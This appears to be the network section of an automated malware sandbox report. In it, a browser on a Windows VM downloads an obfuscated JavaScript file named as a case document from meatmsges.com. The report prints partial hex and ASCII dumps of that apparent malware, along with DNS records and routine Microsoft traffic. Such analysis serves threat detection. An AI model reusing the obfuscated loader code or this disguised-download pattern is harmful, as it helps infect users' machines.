Oct 2, 2024 01:13:29.817661047 CEST	53	57222	1.1.1.1	192.168.2.6
Oct 2, 2024 01:13:29.817996979 CEST	53	62172	1.1.1.1	192.168.2.6
Oct 2, 2024 01:13:43.445694923 CEST	53	64465	1.1.1.1	192.168.2.6
Oct 2, 2024 01:14:02.444017887 CEST	53	64396	1.1.1.1	192.168.2.6
Oct 2, 2024 01:14:24.776535988 CEST	53	55499	1.1.1.1	192.168.2.6
Oct 2, 2024 01:14:25.461384058 CEST	53	63111	1.1.1.1	192.168.2.6
Oct 2, 2024 01:14:52.571001053 CEST	53	60855	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 2, 2024 01:13:27.002365112 CEST	192.168.2.6	1.1.1.1	0x1c12	Standard query (0)	meatmsges.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 01:13:27.002549887 CEST	192.168.2.6	1.1.1.1	0xe58b	Standard query (0)	meatmsges.com	65	IN (0x0001)	false
Oct 2, 2024 01:13:29.810864925 CEST	192.168.2.6	1.1.1.1	0x2448	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 01:13:29.811330080 CEST	192.168.2.6	1.1.1.1	0xabbc	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 2, 2024 01:13:27.010662079 CEST	1.1.1.1	192.168.2.6	0x1c12	No error (0)	meatmsges.com		185.172.129.102	A (IP address)	IN (0x0001)	false
Oct 2, 2024 01:13:29.817661047 CEST	1.1.1.1	192.168.2.6	0x2448	No error (0)	www.google.com		142.250.185.132	A (IP address)	IN (0x0001)	false
Oct 2, 2024 01:13:29.817996979 CEST	1.1.1.1	192.168.2.6	0xabbc	No error (0)	www.google.com			65	IN (0x0001)	false
Oct 2, 2024 01:13:38.810911894 CEST	1.1.1.1	192.168.2.6	0x5532	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 2, 2024 01:13:38.810911894 CEST	1.1.1.1	192.168.2.6	0x5532	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Oct 2, 2024 01:13:58.566368103 CEST	1.1.1.1	192.168.2.6	0x2b6f	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Oct 2, 2024 01:13:58.566368103 CEST	1.1.1.1	192.168.2.6	0x2b6f	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

meatmsges.com

fs.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49718	185.172.129.102	443	1292	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 23:13:27 UTC	656	OUT	GET / HTTP/1.1 Host: meatmsges.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-01 23:13:28 UTC	402	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 23:13:28 GMT Server: Apache/2.4.52 (Ubuntu) Set-Cookie: PHPSESSID=t1r7tal7isdng5j7uu764ct7in; path=/ Expires: 0 Cache-Control: no-cache, must-revalidate Pragma: public Content-Description: File Transfer Content-Disposition: attachment; filename="MyCase_09.2024_717.js" Content-Length: 406616 Connection: close Content-Type: application/octet-stream
2024-10-01 23:13:28 UTC	16384	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 62 32 33 62 38 31 2c 5f 30 78 35 61 65 63 30 63 29 7b 76 61 72 20 5f 30 78 31 37 62 61 39 32 3d 5f 30 78 32 65 39 39 2c 5f 30 78 38 33 34 32 3d 5f 30 78 62 32 33 62 38 31 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 31 34 35 62 65 30 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 37 62 61 39 32 28 30 78 34 66 30 29 29 2f 28 30 78 31 63 31 36 2b 30 78 31 64 2a 30 78 35 30 2b 2d 30 78 32 35 2a 30 78 31 30 31 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 37 62 61 39 32 28 30 78 39 62 38 29 29 2f 28 30 78 37 2a 30 78 35 34 61 2b 2d 30 78 31 2a 30 78 31 32 65 61 2b 2d 30 78 31 32 31 61 29 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 31 37 62 61 39 32 28 30 78 34 61 61 29 29 2f 28 2d 30 78 34 Data Ascii: (function(_0xb23b81,_0x5aec0c){var _0x17ba92=_0x2e99,_0x8342=_0xb23b81();while(!![]){try{var _0x145be0=-parseInt(_0x17ba92(0x4f0))/(0x1c16+0x1d0x50+-0x250x101)+-parseInt(_0x17ba92(0x9b8))/(0x70x54a+-0x10x12ea+-0x121a)*(parseInt(_0x17ba92(0x4aa))/(-0x4
2024-10-01 23:13:28 UTC	16384	IN	Data Raw: 65 74 75 72 6e 20 5f 30 78 32 38 37 66 32 30 28 5f 30 78 33 30 34 65 63 61 29 3b 7d 2c 27 58 55 4d 63 65 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 33 36 31 36 32 2c 5f 30 78 35 30 33 38 65 31 29 7b 72 65 74 75 72 6e 20 5f 30 78 33 33 36 31 36 32 2b 5f 30 78 35 30 33 38 65 31 3b 7d 2c 27 4e 50 54 76 78 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 62 35 64 30 64 2c 5f 30 78 31 38 62 63 39 64 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 62 35 64 30 64 2b 5f 30 78 31 38 62 63 39 64 3b 7d 2c 27 4a 57 6f 4b 73 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 64 36 39 38 61 2c 5f 30 78 33 63 35 31 35 34 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 64 36 39 38 61 2a 5f 30 78 33 63 35 31 35 34 3b 7d 2c 27 45 54 65 49 52 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 38 36 36 39 Data Ascii: eturn _0x287f20(_0x304eca);},'XUMce':function(_0x336162,_0x5038e1){return _0x336162+_0x5038e1;},'NPTvx':function(_0x4b5d0d,_0x18bc9d){return _0x4b5d0d+_0x18bc9d;},'JWoKs':function(_0x1d698a,_0x3c5154){return _0x1d698a*_0x3c5154;},'ETeIR':function(_0x28669
2024-10-01 23:13:28 UTC	16384	IN	Data Raw: 34 31 39 65 30 63 28 30 78 36 63 65 29 5d 28 2d 28 30 78 31 2a 2d 30 78 31 35 35 63 2b 2d 30 78 64 2a 2d 30 78 32 37 37 2b 2d 30 78 32 2a 30 78 63 35 29 2c 2d 30 78 31 66 30 61 2b 30 78 33 38 31 2b 30 78 31 62 38 61 29 2c 2d 28 30 78 32 38 35 2b 30 78 31 65 31 36 2b 2d 30 78 31 63 32 30 29 29 2c 30 78 31 2a 30 78 31 33 38 35 2b 2d 30 78 34 2a 30 78 31 37 66 2b 30 78 31 2a 30 78 32 33 29 29 29 29 2c 5f 30 78 33 61 36 36 32 39 5b 5f 30 78 33 30 36 35 39 61 5b 5f 30 78 34 31 39 65 30 63 28 30 78 36 64 31 29 5d 28 5f 30 78 32 64 35 38 34 38 2c 2d 30 78 34 35 2a 2d 30 78 36 35 2b 2d 30 78 33 65 2a 30 78 36 36 2b 30 78 31 2a 2d 30 78 31 31 35 29 5d 28 2d 5f 30 78 33 61 36 36 32 39 5b 5f 30 78 33 30 36 35 39 61 5b 5f 30 78 34 31 39 65 30 63 28 30 78 33 65 34 29 Data Ascii: 419e0c(0x6ce)](-(0x1-0x155c+-0xd-0x277+-0x20xc5),-0x1f0a+0x381+0x1b8a),-(0x285+0x1e16+-0x1c20)),0x10x1385+-0x40x17f+0x10x23)))),_0x3a6629[_0x30659a[_0x419e0c(0x6d1)](_0x2d5848,-0x45-0x65+-0x3e0x66+0x1*-0x115)](-_0x3a6629[_0x30659a[_0x419e0c(0x3e4)
2024-10-01 23:13:28 UTC	16384	IN	Data Raw: 30 78 34 65 37 39 32 64 5b 5f 30 78 35 32 38 66 32 38 28 30 78 32 30 64 29 5d 2c 5f 30 78 34 65 37 39 32 64 5b 5f 30 78 35 32 38 66 32 38 28 30 78 36 34 36 29 5d 2c 5f 30 78 34 65 37 39 32 64 5b 5f 30 78 35 32 38 66 32 38 28 30 78 38 62 65 29 5d 2c 5f 30 78 34 65 37 39 32 64 5b 5f 30 78 35 32 38 66 32 38 28 30 78 37 64 35 29 5d 2c 5f 30 78 34 65 37 39 32 64 5b 5f 30 78 35 32 38 66 32 38 28 30 78 31 35 34 29 5d 2c 5f 30 78 34 65 37 39 32 64 5b 5f 30 78 35 32 38 66 32 38 28 30 78 34 63 35 29 5d 2c 5f 30 78 34 65 37 39 32 64 5b 5f 30 78 35 32 38 66 32 38 28 30 78 38 35 62 29 5d 2c 5f 30 78 34 65 37 39 32 64 5b 5f 30 78 35 32 38 66 32 38 28 30 78 32 38 62 29 5d 2c 5f 30 78 34 65 37 39 32 64 5b 5f 30 78 35 32 38 66 32 38 28 30 78 37 39 66 29 5d 2c 5f 30 78 34 Data Ascii: 0x4e792d[_0x528f28(0x20d)],_0x4e792d[_0x528f28(0x646)],_0x4e792d[_0x528f28(0x8be)],_0x4e792d[_0x528f28(0x7d5)],_0x4e792d[_0x528f28(0x154)],_0x4e792d[_0x528f28(0x4c5)],_0x4e792d[_0x528f28(0x85b)],_0x4e792d[_0x528f28(0x28b)],_0x4e792d[_0x528f28(0x79f)],_0x4
2024-10-01 23:13:28 UTC	16384	IN	Data Raw: 78 38 33 36 35 37 34 29 7b 72 65 74 75 72 6e 20 5f 30 78 33 39 38 33 63 62 2a 5f 30 78 38 33 36 35 37 34 3b 7d 2c 27 64 42 72 46 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 32 31 39 64 33 2c 5f 30 78 39 63 66 64 63 32 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 32 31 39 64 33 2a 5f 30 78 39 63 66 64 63 32 3b 7d 2c 27 62 56 4c 7a 54 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 61 36 33 33 32 2c 5f 30 78 33 65 65 38 31 30 29 7b 72 65 74 75 72 6e 20 5f 30 78 33 61 36 33 33 32 2b 5f 30 78 33 65 65 38 31 30 3b 7d 2c 27 78 57 45 78 54 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 66 34 36 62 35 2c 5f 30 78 31 63 61 34 62 32 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 66 34 36 62 35 2b 5f 30 78 31 63 61 34 62 32 3b 7d 2c 27 6d 41 68 4a 7a 27 3a 66 75 6e 63 74 69 6f 6e Data Ascii: x836574){return _0x3983cb_0x836574;},'dBrFZ':function(_0x1219d3,_0x9cfdc2){return _0x1219d3_0x9cfdc2;},'bVLzT':function(_0x3a6332,_0x3ee810){return _0x3a6332+_0x3ee810;},'xWExT':function(_0x5f46b5,_0x1ca4b2){return _0x5f46b5+_0x1ca4b2;},'mAhJz':function
2024-10-01 23:13:28 UTC	16384	IN	Data Raw: 63 37 34 61 66 5b 5f 30 78 32 30 34 33 36 35 28 30 78 31 30 33 29 5d 28 5f 30 78 35 38 35 38 61 39 2c 30 78 34 39 2a 2d 30 78 38 2b 30 78 31 63 36 2a 2d 30 78 31 33 2b 30 78 32 37 32 32 29 5d 28 5f 30 78 32 30 65 66 66 33 2c 5f 30 78 32 63 37 34 61 66 5b 5f 30 78 32 30 34 33 36 35 28 30 78 31 62 33 29 5d 28 5f 30 78 32 63 37 34 61 66 5b 5f 30 78 32 30 34 33 36 35 28 30 78 32 37 36 29 5d 28 2d 30 78 31 34 34 35 2b 30 78 31 37 66 35 2b 2d 30 78 33 35 31 2c 2d 30 78 32 2a 2d 30 78 31 31 38 33 2b 30 78 64 39 31 2b 2d 30 78 32 30 30 39 29 2c 5f 30 78 32 63 37 34 61 66 5b 5f 30 78 32 30 34 33 36 35 28 30 78 38 61 63 29 5d 28 2d 28 30 78 32 32 66 37 2b 30 78 31 66 61 66 2a 30 78 31 2b 30 78 31 2a 2d 30 78 34 32 61 31 29 2c 2d 30 78 31 39 30 2b 30 78 31 2a 2d 30 Data Ascii: c74af[_0x204365(0x103)](_0x5858a9,0x49-0x8+0x1c6-0x13+0x2722)](_0x20eff3,_0x2c74af[_0x204365(0x1b3)](_0x2c74af[_0x204365(0x276)](-0x1445+0x17f5+-0x351,-0x2-0x1183+0xd91+-0x2009),_0x2c74af[_0x204365(0x8ac)](-(0x22f7+0x1faf0x1+0x1-0x42a1),-0x190+0x1-0
2024-10-01 23:13:28 UTC	16384	IN	Data Raw: 37 28 5f 30 78 38 66 30 32 32 2c 5f 30 78 34 36 36 38 30 61 29 7b 76 61 72 20 5f 30 78 33 38 35 62 61 32 3d 5f 30 78 32 65 39 39 2c 5f 30 78 34 66 38 61 66 61 3d 7b 27 41 55 6d 76 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 33 66 31 61 32 2c 5f 30 78 34 39 31 66 32 32 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 33 66 31 61 32 2d 5f 30 78 34 39 31 66 32 32 3b 7d 2c 27 58 6f 67 65 57 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 61 61 63 62 35 66 29 7b 72 65 74 75 72 6e 20 5f 30 78 61 61 63 62 35 66 28 29 3b 7d 2c 27 70 57 50 49 66 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 65 32 31 39 66 2c 5f 30 78 35 38 33 63 33 62 2c 5f 30 78 34 39 37 38 62 65 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 65 32 31 39 66 28 5f 30 78 35 38 33 63 33 62 2c 5f 30 78 34 39 37 38 62 65 Data Ascii: 7(_0x8f022,_0x46680a){var _0x385ba2=_0x2e99,_0x4f8afa={'AUmvz':function(_0x53f1a2,_0x491f22){return _0x53f1a2-_0x491f22;},'XogeW':function(_0xaacb5f){return _0xaacb5f();},'pWPIf':function(_0x1e219f,_0x583c3b,_0x4978be){return _0x1e219f(_0x583c3b,_0x4978be
2024-10-01 23:13:28 UTC	16384	IN	Data Raw: 72 65 74 75 72 6e 20 5f 30 78 34 33 39 31 38 37 5b 5f 30 78 32 39 34 37 34 33 28 30 78 39 31 30 29 5d 28 5f 30 78 35 38 62 33 32 38 2c 5f 30 78 64 61 62 33 37 31 29 3b 7d 2c 27 44 6d 61 78 54 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 38 37 35 62 65 64 2c 5f 30 78 34 35 31 30 33 36 29 7b 76 61 72 20 5f 30 78 61 62 36 37 61 66 3d 5f 30 78 32 65 39 39 3b 72 65 74 75 72 6e 20 5f 30 78 34 33 39 31 38 37 5b 5f 30 78 61 62 36 37 61 66 28 30 78 39 33 62 29 5d 28 5f 30 78 38 37 35 62 65 64 2c 5f 30 78 34 35 31 30 33 36 29 3b 7d 2c 27 5a 54 7a 4c 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 39 39 63 31 36 2c 5f 30 78 38 34 66 34 36 32 29 7b 76 61 72 20 5f 30 78 34 38 65 32 36 61 3d 5f 30 78 32 65 39 39 3b 72 65 74 75 72 6e 20 5f 30 78 34 33 39 31 38 37 5b 5f 30 Data Ascii: return _0x439187[_0x294743(0x910)](_0x58b328,_0xdab371);},'DmaxT':function(_0x875bed,_0x451036){var _0xab67af=_0x2e99;return _0x439187[_0xab67af(0x93b)](_0x875bed,_0x451036);},'ZTzLZ':function(_0x499c16,_0x84f462){var _0x48e26a=_0x2e99;return _0x439187[_0
2024-10-01 23:13:28 UTC	16384	IN	Data Raw: 78 32 38 37 2a 2d 30 78 61 2b 30 78 61 2a 30 78 34 36 31 29 5d 28 5f 30 78 34 32 39 37 38 66 2c 5f 30 78 34 33 39 31 38 37 5b 5f 30 78 62 38 30 38 32 62 28 30 78 61 65 39 29 5d 28 5f 30 78 34 33 39 31 38 37 5b 5f 30 78 62 38 30 38 32 62 28 30 78 61 34 30 29 5d 28 30 78 31 34 62 62 2a 30 78 33 2b 30 78 31 2a 2d 30 78 34 30 36 66 2b 2d 30 78 32 32 66 31 2a 2d 30 78 31 2c 30 78 64 38 36 2b 30 78 32 2a 2d 30 78 37 32 37 2b 30 78 32 36 32 66 29 2c 2d 28 30 78 34 31 32 39 2b 30 78 34 34 32 36 2a 30 78 32 2b 2d 30 78 38 34 66 37 29 29 29 5d 2c 5f 30 78 31 34 36 66 31 34 5b 5f 30 78 33 30 33 38 37 37 5b 5f 30 78 34 33 39 31 38 37 5b 5f 30 78 62 38 30 38 32 62 28 30 78 62 30 32 29 5d 28 5f 30 78 35 31 30 32 30 32 2c 30 78 31 2a 2d 30 78 32 33 66 65 2b 2d 30 78 31 Data Ascii: x287-0xa+0xa0x461)](_0x42978f,_0x439187[_0xb8082b(0xae9)](_0x439187[_0xb8082b(0xa40)](0x14bb0x3+0x1-0x406f+-0x22f1-0x1,0xd86+0x2-0x727+0x262f),-(0x4129+0x44260x2+-0x84f7)))],_0x146f14[_0x303877[_0x439187[_0xb8082b(0xb02)](_0x510202,0x1-0x23fe+-0x1
2024-10-01 23:13:28 UTC	16384	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 39 66 63 62 65 2c 5f 30 78 33 36 36 34 65 37 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 39 66 63 62 65 28 5f 30 78 33 36 36 34 65 37 29 3b 7d 2c 27 62 65 42 78 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 66 62 64 32 62 2c 5f 30 78 34 34 30 61 33 36 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 66 62 64 32 62 28 5f 30 78 34 34 30 61 33 36 29 3b 7d 2c 27 54 63 7a 56 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 33 66 38 35 32 2c 5f 30 78 34 30 63 32 39 61 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 33 66 38 35 32 28 5f 30 78 34 30 63 32 39 61 29 3b 7d 2c 27 55 4c 6f 77 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 39 37 31 39 34 39 2c 5f 30 78 33 31 33 32 62 36 29 7b 72 65 74 75 72 6e 20 5f 30 78 39 37 31 39 34 39 28 5f 30 78 33 Data Ascii: function(_0x59fcbe,_0x3664e7){return _0x59fcbe(_0x3664e7);},'beBxM':function(_0x2fbd2b,_0x440a36){return _0x2fbd2b(_0x440a36);},'TczVm':function(_0x13f852,_0x40c29a){return _0x13f852(_0x40c29a);},'ULowl':function(_0x971949,_0x3132b6){return _0x971949(_0x3

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.6	49715	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2024-10-01 23:13:27 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 42 39 68 35 62 46 71 6c 69 30 36 36 39 54 6f 6e 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 35 30 36 66 66 31 34 66 35 32 33 38 30 37 36 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: B9h5bFqli0669Ton.1Context: 2506ff14f5238076
2024-10-01 23:13:27 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-10-01 23:13:27 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 42 39 68 35 62 46 71 6c 69 30 36 36 39 54 6f 6e 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 35 30 36 66 66 31 34 66 35 32 33 38 30 37 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 41 53 65 66 6f 69 66 59 57 62 71 56 6d 78 74 71 59 63 32 42 54 5a 33 64 52 46 64 5a 74 2b 74 4e 63 74 66 55 4d 54 37 4b 75 49 76 2b 43 50 72 51 63 70 56 64 41 32 7a 6f 4f 51 4a 36 2b 67 49 76 58 30 47 47 43 52 61 5a 75 66 57 55 2f 77 49 33 51 2b 54 55 35 4f 68 33 39 68 39 61 70 4d 42 42 77 39 77 74 56 78 32 79 53 31 73 4a Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: B9h5bFqli0669Ton.2Context: 2506ff14f5238076<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdASefoifYWbqVmxtqYc2BTZ3dRFdZt+tNctfUMT7KuIv+CPrQcpVdA2zoOQJ6+gIvX0GGCRaZufWU/wI3Q+TU5Oh39h9apMBBw9wtVx2yS1sJ
2024-10-01 23:13:27 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 42 39 68 35 62 46 71 6c 69 30 36 36 39 54 6f 6e 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 35 30 36 66 66 31 34 66 35 32 33 38 30 37 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: B9h5bFqli0669Ton.3Context: 2506ff14f5238076<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-10-01 23:13:27 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-10-01 23:13:27 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 65 6b 32 68 7a 6d 6e 45 59 45 43 2b 4f 75 47 64 62 5a 45 4d 55 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: ek2hzmnEYEC+OuGdbZEMUA.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49722	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-10-01 23:13:31 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-10-01 23:13:31 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-neu-z1 Cache-Control: public, max-age=149539 Date: Tue, 01 Oct 2024 23:13:31 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49723	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-10-01 23:13:32 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-10-01 23:13:32 UTC	515	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=149482 Date: Tue, 01 Oct 2024 23:13:32 GMT Content-Length: 55 Connection: close X-CID: 2
2024-10-01 23:13:32 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.6	49724	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2024-10-01 23:13:35 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 74 73 70 75 79 52 70 53 45 55 36 63 7a 31 4a 41 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 32 34 32 32 39 66 34 30 31 36 38 32 38 31 35 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: tspuyRpSEU6cz1JA.1Context: 724229f401682815
2024-10-01 23:13:35 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: 